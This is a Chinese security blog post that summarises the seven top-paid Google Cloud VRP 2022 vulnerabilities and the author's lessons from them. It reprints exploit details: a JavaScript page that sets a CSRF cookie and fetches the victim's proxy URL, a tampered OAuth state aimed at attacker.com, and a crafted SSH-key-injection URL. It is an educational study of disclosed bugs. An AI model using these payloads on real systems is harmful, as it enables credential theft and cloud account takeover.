<!DOCTYPE html><html class="appearance-auto" lang="cn"><head><meta charset="UTF-8"><title>GoogleCloudVrp-top7-2022-Study-and-Ideas</title><meta name="description" content="J0o1ey Blog | Hack for Sec and Good"><meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no, initial-scale=1"><!-- Google Analytics --><!-- End Google Analytics -->
<!-- Baidu Analytics --><script>var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "//hm.baidu.com/hm.js?" + '1da71ad199e154beef984da705235690';
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();</script><!-- End Baidu Analytics --><link rel="icon" href="/images/favicon.ico"><link rel="stylesheet" href="/style/common/bulma.css"><link rel="stylesheet" href="/style/base.css"><link rel="stylesheet" href="/style/common/helper.css"><script src="/js/common.js"></script><link rel="stylesheet" href="/style/post.css"><link rel="stylesheet" href="/style/themes/highlight-theme-light.css"><link rel="stylesheet" href="/style/common/jquery.fancybox.min.css"><script src="/js/highlight.pack.js"></script><meta name="description" content="前言：Google安全团队近期发布了2022年GoogleCloud VRP中赏金top7的漏洞
https://security.googleblog.com/2023/06/google-cloud-awards-313337-in-2022-vrp.html?continueFlag=8d8e2a2b6ab56e4030b5b194ac3f4922

1st Prize - $133,337: Yuval Avrahami for the report and write-up Privilege escalations in GKE Autopilot. Yuval’s excellent write-up describes several attack paths that would allo.."><meta name="generator" content="Hexo 6.3.0"></head><body class="is-flex is-flex-direction-column"><header class="header-widget is-flex-shrink-0 is-hidden-mobile"><div class="container is-fullhd is-flex is-justify-content-space-between is-align-items-center is-full-height"><section class="is-hidden-mobile is-flex-shrink-0"><h2><a href="/">J0o1ey's blog</a></h2></section><h3 class="is-hidden-mobile is-family-serif is-full-height is-flex is-align-items-center is-flex-shrink-0"><div class="is-full-height" id="postTopic"><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">GoogleCloudVrp-top7-2022-Study-and-Ideas</p><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">点击返回顶部</p></div></h3><aside class="is-flex-shrink-0"><h3 class="is-inline-block"><a href="/">首页</a></h3><h3 class="is-inline-block"><a href="/about">关于</a></h3><h3 class="is-inline-block"><a href="/archives">归档</a></h3></aside></div></header><header class="is-flex header-widget is-flex-shrink-0 is-align-items-center is-justify-content-center is-hidden-tablet"><h3 class="is-inline-block"><a href="/">首页</a></h3><h3 class="is-inline-block"><a href="/about">关于</a></h3><h3 class="is-inline-block"><a href="/archives">归档</a></h3></header><main><main class="container is-max-widescreen content section post-page pt-4 px-4"><div class="columns is-flex-desktop is-justify-content-center is-flex-direction-row-reverse"><div class="column is-3 is-hidden-mobile"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80%EF%BC%9A"><span class="toc-text">前言：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7th-Prize-Command-injection-in-Cloud-Shell-%EF%BF%A513337"><span class="toc-text">7th Prize: Command injection in Cloud Shell - ￥13337</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8F%91%E6%8E%98%E7%9A%84%E6%80%9D%E8%80%83%E7%82%B9%EF%BC%9A"><span class="toc-text">漏洞发掘的思考点：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6th-Prize-A-Few-Bugs-in-the-Google-Cloud-Shell-%EF%BF%A513337"><span class="toc-text">6th Prize: A Few Bugs in the Google Cloud Shell - ￥13337</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8F%91%E6%8E%98%E7%9A%84%E6%80%9D%E8%80%83%E7%82%B9%EF%BC%9A-1"><span class="toc-text">漏洞发掘的思考点：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5th-Prize-Kubernetes-Privilege-Escalation-Excessive-Permissions-in-Popular-Platforms-17-311"><span class="toc-text">5th Prize: Kubernetes Privilege Escalation: Excessive Permissions in Popular Platforms - $17,311</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8F%91%E6%8E%98%E7%9A%84%E6%80%9D%E8%80%83%E7%82%B9%EF%BC%9A-2"><span class="toc-text">漏洞发掘的思考点：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4th-Prize-Client-Side-SSRF-to-Google-Cloud-Project-Takeover-31-311"><span class="toc-text">4th Prize: Client-Side SSRF to Google Cloud Project Takeover - $31,311</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Bypass"><span class="toc-text">Bypass</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8F%91%E6%8E%98%E7%9A%84%E6%80%9D%E8%80%83%E7%82%B9%EF%BC%9A-3"><span class="toc-text">漏洞发掘的思考点：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3rd-Prize-Bypassing-Authorization-in-Cloud-Workstations-31337"><span class="toc-text">3rd Prize: Bypassing Authorization in Cloud Workstations - $31337</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8F%91%E6%8E%98%E7%9A%84%E6%80%9D%E8%80%83%E7%82%B9%EF%BC%9A-4"><span class="toc-text">漏洞发掘的思考点：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2nd-Prize-SSH-Key-Injection-on-GCE-73-331"><span class="toc-text">2nd Prize: SSH Key Injection on GCE - $73,331</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8F%91%E6%8E%98%E7%9A%84%E6%80%9D%E8%80%83%E7%82%B9%EF%BC%9A-5"><span class="toc-text">漏洞发掘的思考点：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#1st-Prize-Privilege-escalations-in-GKE-Autopilot-133-337"><span class="toc-text">1st Prize: Privilege escalations in GKE Autopilot - $133,337</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E6%9D%A1%E6%94%BB%E5%87%BB%E9%93%BE"><span class="toc-text">第一条攻击链</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E6%9D%A1%E6%94%BB%E5%87%BB%E9%93%BE"><span class="toc-text">第二条攻击链</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%8F%91%E6%8E%98%E7%9A%84%E6%80%9D%E8%80%83%E7%82%B9%EF%BC%9A-6"><span class="toc-text">漏洞发掘的思考点：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E8%A8%80%EF%BC%9A"><span class="toc-text">后言：</span></a></li></ol></div><div class="column is-9"><header class="my-4"><a href="/tags/%E8%AE%AE%E9%A2%98%E5%AD%A6%E4%B9%A0"><i class="tag post-item-tag">议题学习</i></a></header><h1 class="mt-0 mb-1 is-family-serif" id="postTitle">GoogleCloudVrp-top7-2022-Study-and-Ideas</h1><time class="has-text-grey" datetime="2023-06-28T13:14:05.000Z">2023-06-28</time><article class="mt-2 post-content"><h2 id="前言："><a href="#前言：" class="headerlink" title="前言："></a>前言：</h2><p>Google安全团队近期发布了2022年GoogleCloud VRP中赏金top7的漏洞</p>
<p><a target="_blank" rel="noopener" href="https://security.googleblog.com/2023/06/google-cloud-awards-313337-in-2022-vrp.html?continueFlag=8d8e2a2b6ab56e4030b5b194ac3f4922">https://security.googleblog.com/2023/06/google-cloud-awards-313337-in-2022-vrp.html?continueFlag=8d8e2a2b6ab56e4030b5b194ac3f4922</a></p>
<blockquote>
<p><strong>1st Prize -</strong> $133,337: Yuval Avrahami for the report and write-up <a target="_blank" rel="noopener" href="https://unit42.paloaltonetworks.com/gke-autopilot-vulnerabilities/">Privilege escalations in GKE Autopilot</a>. Yuval’s excellent write-up describes several attack paths that would allow an attacker with permission to create pods in an Autopilot cluster to escalate privileges and compromise the underlying node VMs. While these VMs are accessible to customers in GKE Standard, this research led to several <a target="_blank" rel="noopener" href="https://cloud.google.com/anthos/clusters/docs/security-bulletins#gcp-2022-009">hardening improvements</a> in Autopilot that make it a better <a target="_blank" rel="noopener" href="https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-security">secure-by-default</a> Kubernetes offering.</p>
<p><strong>2nd Prize -</strong> $73,331: Sivanesh Ashok and Sreeram KL for the report and write-up <a target="_blank" rel="noopener" href="https://blog.stazot.com/ssh-key-injection-google-cloud/">SSH Key Injection on GCE</a>. Their write-up describes the journey of discovering a vulnerability that would allow an attacker to gain access to a user’s GCE VM by tricking them into clicking a link. They demonstrate the importance of persistence and turned a strange behavior in user creation into an injection of arbitrary SSH public keys.</p>
<p><strong>3rd Prize -</strong>  $31,337: Sivanesh Ashok and Sreeram KL for the report and write-up <a target="_blank" rel="noopener" href="https://blog.stazot.com/auth-bypass-in-google-cloud-workstations/">Bypassing Authorization in Cloud Workstations</a>. Their write-up describes their research process for analyzing Cloud Workstations and then a full-chain exploit to steal a user’s access token by abusing the format of an OAuth state parameter.</p>
<p><strong>4th Prize -</strong> $31,311: Sreeram KL and Sivanesh Ashok for the report and write-up <a target="_blank" rel="noopener" href="https://blog.geekycat.in/client-side-ssrf-to-google-cloud-project-takeover/">Client-Side SSRF to Google Cloud Project Takeover</a>. Their write-up combines a client-side SSRF, a CSRF bypass, and a clever 3xx redirect by “deactivating” a Feedburner proxy. An attacker could use this vulnerability to steal a Vertex AI user’s access token by tricking them into clicking a link.</p>
<p><strong>5th Prize -</strong> $17,311: Yuval Avrahami and Shaul Ben Hai for the report and write-up <a target="_blank" rel="noopener" href="https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/kubernetes-privilege-escalation-excessive-permissions-in-popular-platforms">Kubernetes Privilege Escalation: Excessive Permissions in Popular Platforms</a>. Their whitepaper covers privilege escalation vectors in Kubernetes and describes vulnerabilities in many Kubernetes hosting providers, including Azure’s AKS, Amazon’s EKS, and GKE.</p>
<p><strong>6th Prize -</strong> $13,373: Obmi for the report and write-up <a target="_blank" rel="noopener" href="https://obmiblog.blogspot.com/2022/12/gcp-2022-few-bugs-in-google-cloud-shell.html">A Few Bugs in the Google Cloud Shell</a>. Obmi discovered vulnerabilities in the Cloud Shell file upload functionality that would have allowed an attacker to write arbitrary files to a user’s Cloud Shell via cross-site request forgery.</p>
<p><strong>7th Prize -</strong> $13,337: Bugra Eskici for the report and write-up <a target="_blank" rel="noopener" href="https://bugra.ninja/posts/cloudshell-command-injection/">Command injection in Cloud Shell</a>. Bugra found a very curious injection point in a Cloud Shell script that led to a URL query parameter being directly injected into a Python script. This vulnerability would have given an attacker arbitrary code execution in a user’s Cloud Shell if they clicked on an attacker-controlled link.</p>
</blockquote>
<p>本人根据google官方给出的YouTube视频进行了学习,并且根据个人理解对其中的案例细节进行了解释以及思路总结，本文配图均来源于google官方视频与writeup</p>
<p>能力水平有限，如有谬误，欢迎大家指出</p>
<p>Google官方视频：<a target="_blank" rel="noopener" href="https://youtu.be/uOvizKc1WZY">https://youtu.be/uOvizKc1WZY</a></p>
<p>现将TOP 7漏洞案例学习与思考归纳总结如下</p>
<h2 id="7th-Prize-Command-injection-in-Cloud-Shell-￥13337"><a href="#7th-Prize-Command-injection-in-Cloud-Shell-￥13337" class="headerlink" title="7th Prize: Command injection in Cloud Shell - ￥13337"></a>7th Prize: Command injection in Cloud Shell - ￥13337</h2><p>这个站说来惭愧，笔者曾经挖Google VRP的时候也挖过，是一个基于CSRF的command Injection，触发起来比较困难，google安全团队认为这比较鸡肋，因此没有收取漏洞</p>
<p>但是老外却搞到了一个真正的command injection。。让我羡慕不已</p>
<p>在GoogleCloud的web editor中，内置了shell，而url中的project参数似乎总会出现在python config脚本中，并且会引发脚本执行</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306271234324.png" alt="image-20230627123429297"></p>
<p>如上图所示，单引号触发了一个python console error </p>
<p>那么接下来事情就很简单了，根据目标的闭合feature构造一个oneline命令执行即可</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306271240994.png" alt="image-20230627124005960"></p>
<h3 id="漏洞发掘的思考点："><a href="#漏洞发掘的思考点：" class="headerlink" title="漏洞发掘的思考点："></a><strong>漏洞发掘的思考点：</strong></h3><p><strong>永远不要放过任何一个用户可控的参数点~</strong></p>
<h2 id="6th-Prize-A-Few-Bugs-in-the-Google-Cloud-Shell-￥13337"><a href="#6th-Prize-A-Few-Bugs-in-the-Google-Cloud-Shell-￥13337" class="headerlink" title="6th Prize: A Few Bugs in the Google Cloud Shell - ￥13337"></a>6th Prize: A Few Bugs in the Google Cloud Shell - ￥13337</h2><p>漏洞发现者找到了一个基于文件上传的XSS</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306271244864.png" alt="image-20230627124440839"></p>
<p>但是这样触发只是一个self xss，并不符合VRP的收录规则，但是漏洞发现者又通过非常Cool的姿势，发现了此处的CSRF</p>
<p>在本处要实现文件上传处的CSRF，需要获得一个随机的id，但是很显然，这个id并不容易猜解获取</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306271248251.png" alt="image-20230627124856216"></p>
<p>于是漏洞发掘者构造了一个POC，在拖拽图片时可以获取到目标带有这个随机id的文件上传url，从而实现CSRF，进而触发XSS</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306271247346.png" alt="image-20230627124728387"></p>
<p>如下图所示，拖拽这个image，可以获取到这个随机id</p>
<p>进而完成获取id-&gt;文件上传csrf-&gt;实现XSS的攻击链</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306271252333.png" alt="image-20230627125239304"></p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306271253623.png" alt="image-20230627125308590"></p>
<p>不得不说，这一整套利用链非常amazing</p>
<h3 id="漏洞发掘的思考点：-1"><a href="#漏洞发掘的思考点：-1" class="headerlink" title="漏洞发掘的思考点："></a><strong>漏洞发掘的思考点：</strong></h3><p>1.Self XSS结合CSRF变废为宝</p>
<p>2.在某些存在<strong>unique id</strong>的情况下，可考虑通过一些类似于经典的”<strong>click hijacking</strong>“方式，获取看似攻击者无法获取到的讯息</p>
<h2 id="5th-Prize-Kubernetes-Privilege-Escalation-Excessive-Permissions-in-Popular-Platforms-17-311"><a href="#5th-Prize-Kubernetes-Privilege-Escalation-Excessive-Permissions-in-Popular-Platforms-17-311" class="headerlink" title="5th Prize: Kubernetes Privilege Escalation: Excessive Permissions in Popular Platforms - $17,311"></a>5th Prize: Kubernetes Privilege Escalation: Excessive Permissions in Popular Platforms - $17,311</h2><p>这个漏洞比较特殊，与其说叫漏洞，不如说叫安全白皮书~</p>
<p>白皮书并没有直接描述漏洞或者安全问题，但是其揭示了诸多提供Kubernetes服务的公有云厂商在pods失陷后与特权下的”DaemonSets”容器产生的权限提升的火花，并给出了kubernetes权限配置安全合理性的检测工具</p>
<p>Google认为这对于Kubernetes生态有所裨益，因此给出了$17311的奖励</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306271300155.png" alt="image-20230627130025127"></p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306271258692.png" alt="image-20230627125847654"></p>
<p>白皮书链接：</p>
<p><a target="_blank" rel="noopener" href="https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/kubernetes-privilege-escalation-excessive-permissions-in-popular-platforms">https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/kubernetes-privilege-escalation-excessive-permissions-in-popular-platforms</a></p>
<h3 id="漏洞发掘的思考点：-2"><a href="#漏洞发掘的思考点：-2" class="headerlink" title="漏洞发掘的思考点："></a><strong>漏洞发掘的思考点：</strong></h3><p><strong>对于一个项目安全生态有所裨益的产出，往往比单点漏洞拥有更高的普适性价值</strong></p>
<h2 id="4th-Prize-Client-Side-SSRF-to-Google-Cloud-Project-Takeover-31-311"><a href="#4th-Prize-Client-Side-SSRF-to-Google-Cloud-Project-Takeover-31-311" class="headerlink" title="4th Prize: Client-Side SSRF to Google Cloud Project Takeover - $31,311"></a><strong>4th Prize: Client-Side SSRF to Google Cloud Project Takeover -</strong> $31,311</h2><p>这个漏洞的发掘team同样是3th,2th奖励的发现者，可谓是神雕侠侣了。。。</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306271336814.png" alt="image-20230627133641772"></p>
<p>漏洞发掘者在pentest中发现了如下的URL：</p>
<blockquote>
<p>https:&#x2F;&#x2F;{INSTANCE-ID}-dot-us-central1.notebooks.googleusercontent.com&#x2F;aipn&#x2F;v2&#x2F;proxy&#x2F;<strong>compute.googleapis.com</strong>&#x2F;something</p>
</blockquote>
<p>感觉这个点可能存在SSRF后使用了自己的域名进行测试</p>
<blockquote>
<p>https:&#x2F;&#x2F;{INSTANCE-ID}-dot-us-central1.notebooks.googleusercontent.com&#x2F;aipn&#x2F;v2&#x2F;proxy&#x2F;<strong>geekycat.in</strong>&#x2F;something</p>
</blockquote>
<p>但是并不奏效，于是用了一个简单的tips bypass了限制</p>
<blockquote>
<p><code>https://&#123;INSTANCE-ID&#125;-dot-us-central1.notebooks.googleusercontent.com/aipn/v2/proxy/&#123;attacker.com&#125;/compute.googleapis.com/</code> </p>
<p><strong>来自作者：bypasses the check, that was easy 😅</strong></p>
</blockquote>
<p>接下来作者服务器的日志显示，它收到了header中带有Authorization token的请求。</p>
<p>随后验证了Authorization token，发现确实有云平台权限~</p>
<p>至此实现权限接管</p>
<p>google随后修复了这个漏洞，只允许这个点请求*.google.com，但是漏洞发掘者找到了Bypass的方法</p>
<h3 id="Bypass"><a href="#Bypass" class="headerlink" title="Bypass"></a>Bypass</h3><p>漏洞发掘者随后发现了一个谷歌的子域服务 <code>https://feedburner.google.com</code>. </p>
<p>该服务允许可以管理域名下的RSS提要。类似于RSS Proxy一样。</p>
<p>随后漏洞挖掘者通过以下方法视图构建OpenRedirect</p>
<ul>
<li>导航至<code>https://feedburner.google.com</code>–&gt; 创建代理 –&gt; 输入<code>https://attacker.com/rss.xml</code></li>
<li>使用“自定义 URL”–&gt; 创建</li>
</ul>
<p>复制的 URL 的格式如下：<code>https://feeds.feedburner.com/&#123;CUSTOM&#125;/&#123;ID&#125;</code></p>
<ul>
<li>创建代理后，单击三个点 –&gt; 停用 –&gt; 确认</li>
</ul>
<p>现在，受害者访问<code>https://feeds.feedburner.com/&#123;CUSTOM&#125;/&#123;ID&#125;</code>将会实现一个OpenRedirect</p>
<p>但是并不是一帆风顺的</p>
<p>访问<code>https://&#123;INSTANCE-ID&#125;-dot-us-central1.notebooks.googleusercontent.com/aipn/v2/proxy/feedproxy.google.com/&#123;CUSTOM&#125;/&#123;ID&#125;</code></p>
<p>无法实现SSRF，因为Google实施了CSRF保护。</p>
<p>随后漏洞发掘者注意到Jupyter notebook是部署在tornado上的，而tornado有一种绕过csrf校验的方法：</p>
<blockquote>
<p>Tornado服务器会比较GET参数&#x2F;POST包中的CSRF令牌与cookie中的CSRF令牌。</p>
<p>如果两者都匹配，则通过。否则，失败。</p>
<p><strong>由于子域可以将cookie设置为父域，因此在任何子域中执行javascript将允许我们为cookie设置任意CSRF令牌，然后绕过CSRF保护。</strong></p>
</blockquote>
<p>于是漏洞挖掘者在googleusercontent.com部署了一个jupyter</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306271428761.png" alt="image-20230627142813741"></p>
<p>并且修改了Jupyter笔记本的索引页(位于&#x2F;opt&#x2F;conda&#x2F;share&#x2F; Jupyter &#x2F;lab&#x2F;static下)</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306271428358.png" alt="image-20230627142804323"></p>
<p>由于已经成功地获得了javascript的执行权，我们现在可以设置任意的CSRF令牌并绕过保护。</p>
<pre><code class="html">&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
&lt;body&gt;
    &lt;script&gt;
        var base_domain = document.domain.substr(document.domain.indexOf(&#39;.&#39;));
        document.cookie=&#39;_xsrf=1;Domain=&#39;+base_domain;
fetch(&quot;https://&#123;VICTIM-INSTANCE-ID&#125;-dot-us-central1.notebooks.googleusercontent.com/aipn/v2/proxy/feedproxy.google.com/&#123;CUSTOM&#125;/&#123;ID&#125;?_xsrf=1&quot;,&#123;credentials:&quot;include&quot;,mode:&quot;no-cors&quot;&#125;)
    &lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<p>进而获取Authorization header，漏洞利用完成~</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306271428288.png" alt="image-20230627142855242"></p>
<h3 id="漏洞发掘的思考点：-3"><a href="#漏洞发掘的思考点：-3" class="headerlink" title="漏洞发掘的思考点："></a><strong>漏洞发掘的思考点：</strong></h3><p>这个漏洞是我认为bypass最为精妙的一个，学到的有以下几点：</p>
<p>1.tornado的csrf校验bypass feature</p>
<p>2.当厂商在SSRF点限制了自己的根域名后，可以考虑从子域的业务点入手挖掘一个OpenRedirect，在支持302跳转的情况下往往会产生意想不到的效果</p>
<h2 id="3rd-Prize-Bypassing-Authorization-in-Cloud-Workstations-31337"><a href="#3rd-Prize-Bypassing-Authorization-in-Cloud-Workstations-31337" class="headerlink" title="3rd Prize: Bypassing Authorization in Cloud Workstations - $31337"></a>3rd Prize: Bypassing Authorization in Cloud Workstations - $31337</h2><p>这个漏洞比较麻烦，是一个Outh层面的漏洞，Outh中经典的往往是控制redirect url实现凭据劫持</p>
<p>但是这个点稍微多了点步骤，要先获取到受害者outh的url再进行构造才能实现凭据劫持，因此直接给出作者的Attack Chain供大家参考</p>
<blockquote>
<ol>
<li><p><strong>访问{victim-subdomain}.cloudworkstations.dev</strong></p>
</li>
<li><p><strong>被重定向到并给出 500 响应<code>https://ssh.cloud.google.com/devshell/oauth?authuser=0&amp;state=&#123;state-value&#125;</code></strong></p>
</li>
<li><p><strong>state参数为base64加密的字符串，解密后数据实例如下</strong></p>
<pre><code class="json">&#123;&quot;token&quot;:&quot;random-token&quot;,&quot;target_host&quot;:&quot;attacker.com/80-&#123;workstation-name&#125;.cluster-&#123;random-string&#125;.cloudworkstations.dev&quot;,&quot;authuser&quot;:&quot;&quot;,&quot;workstation_name&quot;:&quot;projects/project-name-374312/locations/us-central1/workstationClusters/cluster-name/workstationConfigs/config-name/workstations/workstation-name&quot;,&quot;workstation_consumer_project_number&quot;:&quot;0123456789&quot;&#125;
</code></pre>
<p><strong>从base64解码状态参数，并将target_host值更改为<code>attacker.com/&#123;victim-subdomain&#125;.cloudworkstations.dev</code></strong></p>
</li>
<li><p><strong>将 JSON 重新编码为 base64 并创建新的状态值</strong></p>
</li>
<li><p><strong>使用修改后的状态值制作 OAuth URL -并将恶意链接发送给受害者<code>https://ssh.cloud.google.com/devshell/oauth?authuser=0&amp;state=&#123;malicious-state-value&#125;</code></strong></p>
</li>
<li><p><strong>一旦受害者打开恶意链接，攻击者就会收到对其服务器的 GET 请求，该请求将具有 workstation_jwt 值。</strong></p>
</li>
<li><p><strong>然后，攻击者使用受害者的凭据并访问受害者的工作站<code>https://&#123;victim-subdomain&#125;.cloudworkstations.dev/_workstation/login?redirect=&#123;state-value&#125;&amp;workstation_jwt=&#123;victim-jwt-value&#125;</code></strong></p>
</li>
</ol>
</blockquote>
<h3 id="漏洞发掘的思考点：-4"><a href="#漏洞发掘的思考点：-4" class="headerlink" title="漏洞发掘的思考点："></a><strong>漏洞发掘的思考点：</strong></h3><p>1.多多留意一些弱加密的参数值，往往隐藏着不为人知的秘密</p>
<p>2.Outh漏洞中openRedirect导致的凭据劫持不一定就是写脸上的redirectUrl可控~尽量去发掘可控的redirect参数点，针对实战情况再进行bypass</p>
<h2 id="2nd-Prize-SSH-Key-Injection-on-GCE-73-331"><a href="#2nd-Prize-SSH-Key-Injection-on-GCE-73-331" class="headerlink" title="2nd Prize: SSH Key Injection on GCE - $73,331"></a><strong>2nd Prize: SSH Key Injection on GCE -</strong> $73,331</h2><p>漏洞发掘者在google cloud的<em>Google</em> Compute Engine（GCE）的instance添加SSH Key时，使用了形如</p>
<pre><code>curl https://stazot.com
</code></pre>
<p>的payload</p>
<p>但是却出现了如下图所示的奇葩输出</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306280909736.png" alt="img"></p>
<p>漏洞发掘者瞬间天灵盖炸开，原来冒号:会被当成这个点的分隔符号。</p>
<p>冒号前的作为username，冒号后作为ssh key，并且这一切都是通过get方式进行传参的</p>
<p>因此，漏洞发掘者准备构造URL，让受害者打开恶意链接会将攻击者的用户名和 SSH 密钥添加到他们的计算实例中。</p>
<p>以下 URL attacker:{URL-ENCODED-SSH-PUBLIC-KEY} 作为Exploit处：</p>
<pre><code>https://ssh.cloud.google.com/v2/ssh/projects/&#123;PROJECT-NAME&#125;/zones/&#123;INSTANCE-ZONE&#125;/instances/&#123;INSTANCE-NAME&#125;?newLinuxUsername=attacker:&#123;URL-ENCODED-SSH-PUBLIC-KEY&#125;
</code></pre>
<p>以受害者身份打开链接 - 但是，它没有奏效。</p>
<p>原因是添加的SSH密钥随后附加了Google在后端自动生成的SSH密钥。</p>
<p>为了解决这个问题，漏洞发掘者在有效负载后附加了换行符%0d%0a返回字符：</p>
<pre><code>https://ssh.cloud.google.com/v2/ssh/projects/&#123;PROJECT-NAME&#125;/zones/&#123;INSTANCE-ZONE&#125;/instances/&#123;INSTANCE-NAME&#125;?newLinuxUsername=attacker:&#123;URL-ENCODED-SSH-PUBLIC-KEY&#125;%0d%0a
</code></pre>
<p>成功绕过了限制</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306280919652.png" alt="image-20230628091912594"></p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306280922300.png" alt="image-20230628092202263"></p>
<p>至此实现了一个奇葩情况下产生奇迹的RCE</p>
<h3 id="漏洞发掘的思考点：-5"><a href="#漏洞发掘的思考点：-5" class="headerlink" title="漏洞发掘的思考点："></a><strong>漏洞发掘的思考点：</strong></h3><p>1.测试公有云厂商时，多多留意带有高危操作的功能点，诸如实例用户添加，SSH Key添加的功能点，一但出洞，便是惊涛骇浪</p>
<p>2.在某些情况下可尝试使用%0d%0a等control chars毙掉程序后端自动生成的内容，让我们的漏洞触发点构造与利用更加一帆风顺</p>
<h2 id="1st-Prize-Privilege-escalations-in-GKE-Autopilot-133-337"><a href="#1st-Prize-Privilege-escalations-in-GKE-Autopilot-133-337" class="headerlink" title="1st Prize: Privilege escalations in GKE Autopilot - $133,337"></a>1st Prize: Privilege escalations in GKE Autopilot - $133,337</h2><p>终于来到了top1的vuln（<a target="_blank" rel="noopener" href="https://unit42.paloaltonetworks.com/gke-autopilot-vulnerabilities/%EF%BC%89">https://unit42.paloaltonetworks.com/gke-autopilot-vulnerabilities/）</a></p>
<p>在这个漏洞中，漏洞发掘者挖掘了数条攻击路径，这些路径允许有权在 Autopilot 集群中创建 Pod 的攻击者提升权限并破坏底层节点虚拟机。</p>
<p>Autopilot架构的简化图如图。</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306280950966.png" alt="A simplified diagram of Autopilot&#39;s architecture. Components unique to Autopilot are colored in green and shown with a number corresponding to their role from the list above. Unlike GKE Standard, where nodes are visible as Compute Engine VMs, Autopilot nodes are completely managed by Google, thus colored in green."></p>
<p>Autopilot 特有的组件以绿色显示，并显示与上面列表中的角色对应的数字。</p>
<p>与 GKE Standard 不同，其中节点显示为计算引擎虚拟机，Autopilot 节点完全由 Google 管理，因此显示为绿色。</p>
<p>Autopilot内置了安全策略防止运行Privileged Container，同时阻止用户访问由 Google 管理的群集组件（如节点）; 防止用户访问由 Google 管理的群集组件（如节点），以防止容器逃逸和其他攻击面</p>
<p>如作者给出的图所示</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306280955294.png" alt="image-20230628095555233"></p>
<p>但是作者依然给出了一些可能的攻击面</p>
<ol>
<li><p>GoogleCloud依靠 Autopilot 的策略来防止有风险的配置。</p>
<p>如果攻击者可以以某种方式绕过该策略，他们可能会通过客户期望被阻止的方法（例如部署特权容器）来提升权限。</p>
</li>
<li><p>Autopilot 管理员没有完全特权，受内置策略的限制，无法访问节点和某些特权 Kubernetes API。</p>
<p>如果攻击者可以绕过Autopilot的策略，他们可能会获得比管理员更高的权限，从而为隐形后门打开大门。</p>
</li>
</ol>
<h3 id="第一条攻击链"><a href="#第一条攻击链" class="headerlink" title="第一条攻击链"></a>第一条攻击链</h3><p>Autopilot 禁止可能允许容器逃逸的 Pod 配置。为了支持一些特殊的node访问的附加组件，Autopilot 创建了一个允许列表workloads的概念。如果容器与允许列出的workloads匹配，则允许它使用允许列表工作负载配置中指定的特权功能。漏洞挖掘者测试时，唯一列入允许列表的workloads是 Datadog agent</p>
<p><img src="https://j0o1ey-1251589192.cos.ap-beijing.myqcloud.com/202306281001176.png" alt="In June, the only allow-listed workloads were Datadog agents."></p>
